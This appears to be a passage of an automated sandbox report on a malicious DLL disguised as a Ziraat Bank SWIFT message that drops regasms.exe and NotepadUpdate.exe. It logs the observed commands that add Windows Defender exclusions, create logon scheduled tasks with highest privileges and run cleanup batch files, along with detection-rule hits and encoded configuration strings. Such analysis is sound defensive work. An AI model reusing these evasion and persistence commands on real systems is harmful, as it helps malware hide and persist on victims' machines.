                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_062C012040_2_062C0120
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_062C013040_2_062C0130
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_062C769B40_2_062C769B
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_092D61DD40_2_092D61DD
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_092D124040_2_092D1240
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_092D366840_2_092D3668
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_092D11F840_2_092D11F8
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeCode function: 40_2_092D123040_2_092D1230
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: Number of sections : 59 > 10
                  Source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: regasms.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: AtkzppDHiyvcIR.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Settings.csBase64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Settings.csBase64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Settings.csBase64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Settings.csBase64 encoded string: '+fy4kJHXq5yjoRbT2HlapvDnJRSL4nlaXbmHCfQoBj4MKq9AEaP1jrPdMS/5YJfPKfboE2jJQQkn9MmH9XqiiP9Zwqpt+5j0HKvZpIF/h+phOpJZC8DzZXV3H/mlq6np', 'QMhnCLJh3j2EZSPvoRKnYsvq4WuaVQVcnc/ZVt+e2aFLFzvp9kRZV/qgi3S3zdZJ4kGa0fj7kyAfXBrxh3xn/Q==', 'uUeSzj1moPHzfrJ+bjtIGJI68PX51RXvqSowrdbs9N+JFY13VGwG0KNypMQYrKFVg+beJTIQ75t/Ro5lJDLXOw==', 'J5e3O7FDx+A+XMtNFXJi+5cXLt05QZLCpZYk6FdyzhPG8pqAgJCnfMUQvh8Mc4/d92KpJ/99xGT99ChwxnEa5A==', 'vldddpERTBHeFnXOH4XqSicVG2H7Ae0TiDwpxsRsrrvgQeivkrI/6Y7PDRzxVlai5SIHFidzBsqKrr2ueOTNeQ=='
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: _0020.SetAccessControl
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: _0020.AddAccessRule
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, lVRdylhA8jubWD8j1x.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, lVRdylhA8jubWD8j1x.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: _0020.SetAccessControl
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: _0020.AddAccessRule
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: _0020.SetAccessControl
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.csSecurity API names: _0020.AddAccessRule
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, lVRdylhA8jubWD8j1x.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@58/22@2/2
                  Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\regasms.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMutant created: \Sessions\1\BaseNamedObjects\AevgPZBLIVkjbJsbumvdFn
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMutant created: \Sessions\1\BaseNamedObjects\tnybaidkzovl
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:968:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile created: C:\Users\user\AppData\Local\Temp\tmp18B1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll"
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpen
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe C:\Users\user\AppData\Roaming\regasms.exe
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe C:\Users\user\AppData\Roaming\regasms.exe
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpenJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpenJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe C:\Users\user\AppData\Roaming\regasms.exeJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe C:\Users\user\AppData\Roaming\regasms.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exitJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iertutil.dllJump to behavior
